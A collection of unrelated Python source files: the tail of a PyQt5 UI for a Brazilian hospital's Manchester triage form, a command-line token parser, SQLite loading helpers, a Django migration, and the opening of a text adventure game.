font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCoren.setFont(font)
self.labelCoren.setObjectName("labelCoren")
self.labelSituacaoQueixa = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelSituacaoQueixa.setGeometry(QtCore.QRect(10, 40, 111, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelSituacaoQueixa.setFont(font)
self.labelSituacaoQueixa.setObjectName("labelSituacaoQueixa")
self.labelData_2 = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelData_2.setGeometry(QtCore.QRect(330, 490, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelData_2.setFont(font)
self.labelData_2.setObjectName("labelData_2")
self.textEditDescricaoSituacaoQueixa = QtWidgets.QTextEdit(self.widgetClassificacaoRisco)
self.textEditDescricaoSituacaoQueixa.setGeometry(QtCore.QRect(10, 60, 601, 91))
self.textEditDescricaoSituacaoQueixa.setStyleSheet("background-color: rgb(255, 249, 248);")
self.textEditDescricaoSituacaoQueixa.setObjectName("textEditDescricaoSituacaoQueixa")
self.lineEditEnfermeiro = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditEnfermeiro.setGeometry(QtCore.QRect(110, 450, 211, 20))
self.lineEditEnfermeiro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditEnfermeiro.setText("")
self.lineEditEnfermeiro.setObjectName("lineEditEnfermeiro")
self.radioButtonDestinoAmbulatorio = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoAmbulatorio.setGeometry(QtCore.QRect(300, 420, 82, 17))
self.radioButtonDestinoAmbulatorio.setObjectName("radioButtonDestinoAmbulatorio")
self.labelGrauDor = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGrauDor.setGeometry(QtCore.QRect(450, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGrauDor.setFont(font)
self.labelGrauDor.setObjectName("labelGrauDor")
self.lineEditGrauDor = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGrauDor.setGeometry(QtCore.QRect(510, 260, 21, 20))
self.lineEditGrauDor.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGrauDor.setText("")
self.lineEditGrauDor.setObjectName("lineEditGrauDor")
self.lineEditSaturacao = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditSaturacao.setGeometry(QtCore.QRect(70, 260, 51, 20))
self.lineEditSaturacao.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditSaturacao.setText("")
self.lineEditSaturacao.setObjectName("lineEditSaturacao")
self.textEditDescricaoClassificacaoCor = QtWidgets.QTextEdit(self.widgetClassificacaoRisco)
self.textEditDescricaoClassificacaoCor.setGeometry(QtCore.QRect(210, 300, 191, 91))
self.textEditDescricaoClassificacaoCor.setStyleSheet("background-color: rgb(255, 249, 248);")
self.textEditDescricaoClassificacaoCor.setObjectName("textEditDescricaoClassificacaoCor")
self.labelCor = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCor.setGeometry(QtCore.QRect(350, 200, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCor.setFont(font)
self.labelCor.setObjectName("labelCor")
self.lineEditGlasgow = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlasgow.setGeometry(QtCore.QRect(190, 260, 31, 20))
self.lineEditGlasgow.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlasgow.setText("")
self.lineEditGlasgow.setObjectName("lineEditGlasgow")
self.lineEditGlicemia = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlicemia.setGeometry(QtCore.QRect(390, 260, 51, 20))
self.lineEditGlicemia.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlicemia.setText("")
self.lineEditGlicemia.setObjectName("lineEditGlicemia")
self.labelHoraFim = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelHoraFim.setGeometry(QtCore.QRect(490, 490, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelHoraFim.setFont(font)
self.labelHoraFim.setObjectName("labelHoraFim")
self.timeEditHoraFim = QtWidgets.QTimeEdit(self.widgetClassificacaoRisco)
self.timeEditHoraFim.setGeometry(QtCore.QRect(540, 490, 61, 22))
self.timeEditHoraFim.setStyleSheet("background-color: rgb(242, 255, 250);")
self.timeEditHoraFim.setObjectName("timeEditHoraFim")
self.lineEditGlicemia_2 = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditGlicemia_2.setGeometry(QtCore.QRect(400, 450, 81, 20))
self.lineEditGlicemia_2.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditGlicemia_2.setText("")
self.lineEditGlicemia_2.setObjectName("lineEditGlicemia_2")
self.widgetCabecalho = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetCabecalho.setGeometry(QtCore.QRect(20, 0, 611, 61))
self.widgetCabecalho.setObjectName("widgetCabecalho")
self.labelSubTitulo = QtWidgets.QLabel(self.widgetCabecalho)
self.labelSubTitulo.setGeometry(QtCore.QRect(80, 30, 461, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.labelSubTitulo.setFont(font)
self.labelSubTitulo.setObjectName("labelSubTitulo")
self.line = QtWidgets.QFrame(self.widgetCabecalho)
self.line.setGeometry(QtCore.QRect(0, 50, 611, 20))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.labelTitulo = QtWidgets.QLabel(self.widgetCabecalho)
self.labelTitulo.setGeometry(QtCore.QRect(140, 10, 321, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.labelTitulo.setFont(font)
self.labelTitulo.setObjectName("labelTitulo")
self.widgetRodapeHospital = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetRodapeHospital.setGeometry(QtCore.QRect(20, 900, 611, 80))
self.widgetRodapeHospital.setObjectName("widgetRodapeHospital")
self.labelCNPJ = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelCNPJ.setGeometry(QtCore.QRect(200, 20, 211, 21))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(14)
self.labelCNPJ.setFont(font)
self.labelCNPJ.setObjectName("labelCNPJ")
self.labelTelefoneHosital = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelTelefoneHosital.setGeometry(QtCore.QRect(230, 60, 141, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(10)
self.labelTelefoneHosital.setFont(font)
self.labelTelefoneHosital.setObjectName("labelTelefoneHosital")
self.labelEnderecoHospital = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelEnderecoHospital.setGeometry(QtCore.QRect(190, 40, 231, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(10)
self.labelEnderecoHospital.setFont(font)
self.labelEnderecoHospital.setObjectName("labelEnderecoHospital")
self.labelAssociacao = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelAssociacao.setGeometry(QtCore.QRect(120, 0, 371, 21))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(14)
self.labelAssociacao.setFont(font)
self.labelAssociacao.setObjectName("labelAssociacao")
self.labelLogo = QtWidgets.QLabel(self.widgetRodapeHospital)
self.labelLogo.setGeometry(QtCore.QRect(20, 0, 91, 71))
self.labelLogo.setText("")
self.labelLogo.setPixmap(QtGui.QPixmap("Formularios/logoHospital.png"))
self.labelLogo.setObjectName("labelLogo")
self.widgetIdentificacaoPaciente = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetIdentificacaoPaciente.setGeometry(QtCore.QRect(20, 60, 611, 291))
self.widgetIdentificacaoPaciente.setObjectName("widgetIdentificacaoPaciente")
self.labelEndereco = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelEndereco.setGeometry(QtCore.QRect(90, 170, 71, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEndereco.setFont(font)
self.labelEndereco.setObjectName("labelEndereco")
self.labelIdade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelIdade.setGeometry(QtCore.QRect(0, 90, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelIdade.setFont(font)
self.labelIdade.setObjectName("labelIdade")
self.labelMae = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelMae.setGeometry(QtCore.QRect(260, 130, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelMae.setFont(font)
self.labelMae.setObjectName("labelMae")
self.labelEtnia = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelEtnia.setGeometry(QtCore.QRect(180, 90, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEtnia.setFont(font)
self.labelEtnia.setObjectName("labelEtnia")
self.labelID = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelID.setGeometry(QtCore.QRect(550, 90, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelID.setFont(font)
self.labelID.setObjectName("labelID")
self.labelCidade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelCidade.setGeometry(QtCore.QRect(200, 240, 51, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCidade.setFont(font)
self.labelCidade.setObjectName("labelCidade")
self.lineEditBairro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditBairro.setGeometry(QtCore.QRect(50, 240, 131, 20))
self.lineEditBairro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditBairro.setText("")
self.lineEditBairro.setObjectName("lineEditBairro")
self.labelData = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelData.setGeometry(QtCore.QRect(370, 50, 31, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelData.setFont(font)
self.labelData.setObjectName("labelData")
self.timeEditHoraInicio = QtWidgets.QTimeEdit(self.widgetIdentificacaoPaciente)
self.timeEditHoraInicio.setGeometry(QtCore.QRect(550, 50, 61, 22))
self.timeEditHoraInicio.setStyleSheet("background-color: rgb(242, 255, 250);")
self.timeEditHoraInicio.setObjectName("timeEditHoraInicio")
self.lineEditIdade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditIdade.setGeometry(QtCore.QRect(60, 90, 101, 20))
self.lineEditIdade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditIdade.setText("")
self.lineEditIdade.setObjectName("lineEditIdade")
self.lineEditMae = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditMae.setGeometry(QtCore.QRect(300, 130, 311, 20))
self.lineEditMae.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditMae.setText("")
self.lineEditMae.setObjectName("lineEditMae")
self.lineEditCidade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditCidade.setGeometry(QtCore.QRect(260, 240, 231, 20))
self.lineEditCidade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCidade.setText("")
self.lineEditCidade.setObjectName("lineEditCidade")
self.labelIndentificacaoPaciente = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelIndentificacaoPaciente.setGeometry(QtCore.QRect(200, 0, 191, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelIndentificacaoPaciente.setFont(font)
self.labelIndentificacaoPaciente.setObjectName("labelIndentificacaoPaciente")
self.lineEditEtnia = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditEtnia.setGeometry(QtCore.QRect(220, 90, 101, 20))
self.lineEditEtnia.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditEtnia.setText("")
self.lineEditEtnia.setObjectName("lineEditEtnia")
self.dateEditDataNascimento = QtWidgets.QDateEdit(self.widgetIdentificacaoPaciente)
self.dateEditDataNascimento.setGeometry(QtCore.QRect(410, 50, 81, 22))
self.dateEditDataNascimento.setStyleSheet("background-color: rgb(242, 255, 250);")
self.dateEditDataNascimento.setObjectName("dateEditDataNascimento")
self.labelNumero = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNumero.setGeometry(QtCore.QRect(300, 210, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNumero.setFont(font)
self.labelNumero.setObjectName("labelNumero")
self.lineEditProfissao = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditProfissao.setGeometry(QtCore.QRect(140, 130, 111, 20))
self.lineEditProfissao.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditProfissao.setText("")
self.lineEditProfissao.setObjectName("lineEditProfissao")
self.lineEditComplemento = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditComplemento.setGeometry(QtCore.QRect(490, 210, 121, 20))
self.lineEditComplemento.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditComplemento.setText("")
self.lineEditComplemento.setObjectName("lineEditComplemento")
self.lineEditNaturalidade = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNaturalidade.setGeometry(QtCore.QRect(430, 90, 111, 20))
self.lineEditNaturalidade.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNaturalidade.setText("")
self.lineEditNaturalidade.setObjectName("lineEditNaturalidade")
self.labelNaturalidade = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNaturalidade.setGeometry(QtCore.QRect(330, 90, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNaturalidade.setFont(font)
self.labelNaturalidade.setObjectName("labelNaturalidade")
self.line_2 = QtWidgets.QFrame(self.widgetIdentificacaoPaciente)
self.line_2.setGeometry(QtCore.QRect(0, 270, 611, 20))
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.lineEditNumero = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNumero.setGeometry(QtCore.QRect(330, 210, 51, 20))
self.lineEditNumero.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNumero.setText("")
self.lineEditNumero.setObjectName("lineEditNumero")
self.lineEditRegistro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditRegistro.setGeometry(QtCore.QRect(530, 20, 81, 20))
self.lineEditRegistro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditRegistro.setText("")
self.lineEditRegistro.setObjectName("lineEditRegistro")
self.lineEditLongradouro = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditLongradouro.setGeometry(QtCore.QRect(90, 210, 201, 20))
self.lineEditLongradouro.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditLongradouro.setText("")
self.lineEditLongradouro.setObjectName("lineEditLongradouro")
self.lineEditUF = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditUF.setGeometry(QtCore.QRect(560, 240, 51, 20))
self.lineEditUF.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditUF.setText("")
self.lineEditUF.setObjectName("lineEditUF")
self.labelBairro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelBairro.setGeometry(QtCore.QRect(0, 240, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelBairro.setFont(font)
self.labelBairro.setObjectName("labelBairro")
self.lineEditID = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditID.setGeometry(QtCore.QRect(570, 90, 41, 20))
self.lineEditID.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditID.setText("")
self.lineEditID.setObjectName("lineEditID")
self.labelLongradouro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelLongradouro.setGeometry(QtCore.QRect(0, 210, 81, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelLongradouro.setFont(font)
self.labelLongradouro.setObjectName("labelLongradouro")
self.lineEditNome = QtWidgets.QLineEdit(self.widgetIdentificacaoPaciente)
self.lineEditNome.setGeometry(QtCore.QRect(60, 50, 301, 20))
self.lineEditNome.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNome.setText("")
self.lineEditNome.setObjectName("lineEditNome")
self.labelNome = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelNome.setGeometry(QtCore.QRect(0, 50, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNome.setFont(font)
self.labelNome.setObjectName("labelNome")
self.labelUF = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelUF.setGeometry(QtCore.QRect(520, 240, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelUF.setFont(font)
self.labelUF.setObjectName("labelUF")
self.labelHoraInicio = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelHoraInicio.setGeometry(QtCore.QRect(500, 50, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelHoraInicio.setFont(font)
self.labelHoraInicio.setObjectName("labelHoraInicio")
self.labelRegistro = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelRegistro.setGeometry(QtCore.QRect(460, 20, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelRegistro.setFont(font)
self.labelRegistro.setObjectName("labelRegistro")
self.labelProfissao = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelProfissao.setGeometry(QtCore.QRect(0, 130, 131, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelProfissao.setFont(font)
self.labelProfissao.setObjectName("labelProfissao")
self.labelComplemento = QtWidgets.QLabel(self.widgetIdentificacaoPaciente)
self.labelComplemento.setGeometry(QtCore.QRect(390, 210, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelComplemento.setFont(font)
self.labelComplemento.setObjectName("labelComplemento")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.scrollArea, 0, 0, 1, 1)
FichaAmbulatorialVerso.setCentralWidget(self.centralwidget)
self.retranslateUi(FichaAmbulatorialVerso)
QtCore.QMetaObject.connectSlotsByName(FichaAmbulatorialVerso)
def retranslateUi(self, FichaAmbulatorialVerso):
_translate = QtCore.QCoreApplication.translate
FichaAmbulatorialVerso.setWindowTitle(_translate("FichaAmbulatorialVerso", "SISTEMA DE MANCHESTER"))
self.radioVerde.setText(_translate("FichaAmbulatorialVerso", "Verde"))
self.labelSaturacao.setText(_translate("FichaAmbulatorialVerso", "Saturação:"))
self.labelNumeroFluxograma.setText(_translate("FichaAmbulatorialVerso", "Nº:"))
self.labelTemperatura.setText(_translate("FichaAmbulatorialVerso", "Temp:"))
self.radioAzul.setText(_translate("FichaAmbulatorialVerso", "Azul"))
self.labelDestinoEncaminhamento.setText(_translate("FichaAmbulatorialVerso", "DESTINO/ENCAMINHAMENTO: "))
self.labelCoordenador.setText(_translate("FichaAmbulatorialVerso", "Coordenador (a):"))
self.radioButtonDestinoPSF.setText(_translate("FichaAmbulatorialVerso", "PSF"))
self.labelDiscriminador.setText(_translate("FichaAmbulatorialVerso", "Discriminador: "))
self.labelClassificacaoRisco.setText(_translate("FichaAmbulatorialVerso", "CLASSIFICAÇÃO DE RISCO"))
self.radioButtonDestinoConsultorio.setText(_translate("FichaAmbulatorialVerso", "Consultório"))
self.radioAmarela.setText(_translate("FichaAmbulatorialVerso", "Amarelo"))
self.labelEnfermeiro.setText(_translate("FichaAmbulatorialVerso", "Enfermeiro (a):"))
self.labelFluxograma.setText(_translate("FichaAmbulatorialVerso", "Fluxograma: "))
self.labelGlasgow.setText(_translate("FichaAmbulatorialVerso", "Glasglow:"))
self.labelFC.setText(_translate("FichaAmbulatorialVerso", "FC:"))
self.radioLaranja.setText(_translate("FichaAmbulatorialVerso", "Laranja"))
self.labelGlicemia.setText(_translate("FichaAmbulatorialVerso", "Glicemia:"))
self.radioButtonVermelha.setText(_translate("FichaAmbulatorialVerso", "Vermelha"))
self.labelCoren.setText(_translate("FichaAmbulatorialVerso", "COREN:"))
self.labelSituacaoQueixa.setText(_translate("FichaAmbulatorialVerso", "Situação/Queixa: "))
self.labelData_2.setText(_translate("FichaAmbulatorialVerso", "Data:"))
self.radioButtonDestinoAmbulatorio.setText(_translate("FichaAmbulatorialVerso", "Ambulatório"))
self.labelGrauDor.setText(_translate("FichaAmbulatorialVerso", "Grau Dor:"))
self.labelCor.setText(_translate("FichaAmbulatorialVerso", "Cor:"))
self.labelHoraFim.setText(_translate("FichaAmbulatorialVerso", "Horas: "))
self.labelSubTitulo.setText(_translate("FichaAmbulatorialVerso", "ACOLHIMENTO COM CLASSIFICAÇÃO DE RISCO - SISTEMA DE MANCHESTER"))
self.labelTitulo.setText(_translate("FichaAmbulatorialVerso", "SECRETARIA DE ESTADO DE SAÚDE DE MINAS GERAIS"))
self.labelCNPJ.setText(_translate("FichaAmbulatorialVerso", "CNPJ: 07.605.010/0001-08"))
self.labelTelefoneHosital.setText(_translate("FichaAmbulatorialVerso", " Telefone: (33) 3261-3115"))
self.labelEnderecoHospital.setText(_translate("FichaAmbulatorialVerso", "Rua: Lajão, 93 – Centro– Conselheiro Pena/MG -"))
self.labelAssociacao.setText(_translate("FichaAmbulatorialVerso", "Associação Prefeito Hélcio Valentim de Andrade"))
self.labelEndereco.setText(_translate("FichaAmbulatorialVerso", "ENDEREÇO: "))
self.labelIdade.setText(_translate("FichaAmbulatorialVerso", "Idade:"))
self.labelMae.setText(_translate("FichaAmbulatorialVerso", "Mãe:"))
self.labelEtnia.setText(_translate("FichaAmbulatorialVerso", "Etnia:"))
self.labelID.setText(_translate("FichaAmbulatorialVerso", "ID:"))
self.labelCidade.setText(_translate("FichaAmbulatorialVerso", "Cidade:"))
self.labelData.setText(_translate("FichaAmbulatorialVerso", "Data:"))
self.labelIndentificacaoPaciente.setText(_translate("FichaAmbulatorialVerso", "IDENTIFICAÇÃO DO PACIENTE"))
self.labelNumero.setText(_translate("FichaAmbulatorialVerso", "Nº:"))
self.labelNaturalidade.setText(_translate("FichaAmbulatorialVerso", "Naturalidade:"))
self.labelBairro.setText(_translate("FichaAmbulatorialVerso", "Bairro:"))
self.labelLongradouro.setText(_translate("FichaAmbulatorialVerso", "Longradouro:"))
self.labelNome.setText(_translate("FichaAmbulatorialVerso", "Nome:"))
self.labelUF.setText(_translate("FichaAmbulatorialVerso", "UF:"))
self.labelHoraInicio.setText(_translate("FichaAmbulatorialVerso", "Horas: "))
self.labelRegistro.setText(_translate("FichaAmbulatorialVerso", "Registro:"))
self.labelProfissao.setText(_translate("FichaAmbulatorialVerso", "Profissão/Ocupação:"))
self.labelComplemento.setText(_translate("FichaAmbulatorialVerso", "Complemento:"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
FichaAmbulatorialVerso = QtWidgets.QMainWindow()
ui = Ui_FichaAmbulatorialVerso()
ui.setupUi(FichaAmbulatorialVerso)
FichaAmbulatorialVerso.show()
sys.exit(app.exec_())
|
from argv.tokens import split_flag_token
def parse_tokens(tokens):
'''Read tokens strings into (is_flag, value) tuples:
For this value of `tokens`:
['-f', 'pets.txt', '-v', 'cut', '-cz', '--lost', '--delete=sam', '--', 'lester', 'jack']
`flatten(tokens)` yields an iterable:
[
(True, 'f'),
(False, 'pets.txt'),
(True, 'v'),
(False, 'cut'),
(True, 'c'),
(True, 'z'),
(True, 'lost'),
(True, 'delete'),
(False, 'sam'),
(False, 'lester'),
(False, 'jack'),
]
Todo:
ensure that 'verbose' in '--verbose -- a b c' is treated as a boolean even if not marked as one.
'''
# one pass max
tokens = iter(tokens)
for token in tokens:
if token == '--':
# bleed out tokens without breaking, since tokens is an iterator
for token in tokens:
yield False, token
elif token.startswith('-'):
# this handles both --last=man.txt and -czf=file.tgz
# str.partition produces a 3-tuple whether or not the separator is found
token, sep, value = token.partition('=')
for flag in split_flag_token(token):
yield True, flag
if sep:
# we don't re-flatten the 'value' from '--token=value'
yield False, value
else:
yield False, token
|
from inspect import signature
class Page:
def __init__(self, url, name, builder, auth_needed=None, description=''):
self.name = name
self.url = url
self.auth_needed = auth_needed
self.builder = builder
def as_list(self, param=''):
def call_builder():
if len(signature(self.builder).parameters) > 0:
return self.builder(param)
else:
return self.builder()
return {
'name': self.name,
'content': call_builder()
} |
import os
import sqlite3
import pandas as pd
import numpy as np
from .pybash import get_file_info
def connect_to_db(path):
"""
Interact with a SQLite database
Parameters
----------
path: str
Location of the SQLite database
Returns
-------
conn: Connector
The SQLite connection object
curs: Cursor
The SQLite cursor object
Usage
-----
conn, curs = connect_to_db("data/raw/foo.db")
"""
try:
if os.path.exists(path):
print("Connecting to Existing DB")
conn = sqlite3.connect(path)
else:
print("Initialising new SQLite DB")
conn = sqlite3.connect(path)
curs = conn.cursor()
except:
print("An error occured. Please check the file path")
return conn, curs
def print_table_names(path_to_db):
"""
Print and return the names of tables in a SQLite database
"""
conn, curs = connect_to_db(path_to_db)
result = curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
print(result)
return result
def load_file_to_db(path_to_file, path_to_db, table_name, delim):
"""
Load a text file of any size into a SQLite database
Parameters
----------
path_to_file: str
Location of the text file
path_to_db: str
Location of the SQLite db
table_name: str
Name of the table to be created in the database
delim: str
The delimiter for the text file
Returns
-------
None
"""
conn, curs = connect_to_db(path_to_db)
print("The database at {} contains the following tables.".format(path_to_db))
print(curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
if os.path.exists(path_to_file):
size_ = get_file_info(path_to_file).get('size')
rows_ = get_file_info(path_to_file).get('rows')
try:
if size_ < 250:
print("{} is a small file. Importing directly.".format(path_to_file))
df_ = pd.read_csv(
path_to_file,
sep=delim,
low_memory=False,
error_bad_lines=False,
quoting=csv.QUOTE_NONE
)
df_.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done.")
else:
print("{} is large. Importing in chunks.".format(path_to_file))
csize = int(np.ceil(rows_/10))
chunks = pd.read_csv(
path_to_file,
sep=delim,
chunksize=csize,
error_bad_lines=False,
low_memory=False,
quoting=csv.QUOTE_NONE
)
for c in chunks:
c.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done")
except:
print("An error occurred while reading the file.")
else:
print("File not found at {}, please check the path".format(path_to_file))
return None
|
# Generated by Django 2.0.3 on 2018-04-01 05:28
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=30)),
('confirmacao', models.BooleanField(max_length=3)),
('observacoes', models.TextField()),
('photo', models.ImageField(blank=True, null=True, upload_to='clients_photos')),
],
),
]
|
import time
import random
from random import randint
storytime = random.randint(0, 130)
storytime2 = random.randint(0, 130)
def intro():
print ("Hello....................")
time.sleep(2)
print("Welcome. You are about to engage in the difficult process of decision making. ")
print("Your choices determine your future. ")
print(" Indecision is punishable. Mistakes are costly.")
decision = input("Are you prepared to continue? Y/N\n")
if decision == "Y" or decision == "y":
yourstory()
elif decision == "N" or decision == "n":
ending3()
elif decision == "IDK":
print("Wrong answer. Goodbye.")
else:
ending3()
def arc1():
arc1dec = ""
print("Its dark outside. The woods around you move slowly around you in the night sky.")
print("As you are walking forward you see a large shack. There are no windows and you have no way to know what is inside.")
print("Suddenly you hear a howl close to you. Something is near.")
arc1dec = input("The choice is yours. Do you KNOCK or RUN?")
if arc1dec == "KNOCK" or arc1dec == "Knock" or arc1dec == "knock":
print("KNOCK")
time.sleep(2)
print (".. KNOCK")
time.sleep(2)
print (".... knock")
time.sleep(1)
print ("The last knock cutting off as the door creaks open")
print ("Inside is a dark room with a wooden bed, and a desk and chair with a book on it. Outside the crunching of leaves underfoot")
print (" grows louder. You rush inside and shut and lock the door behind you. ")
arc1dec2 = input("Do you HIDE under the bed or READ the book?")
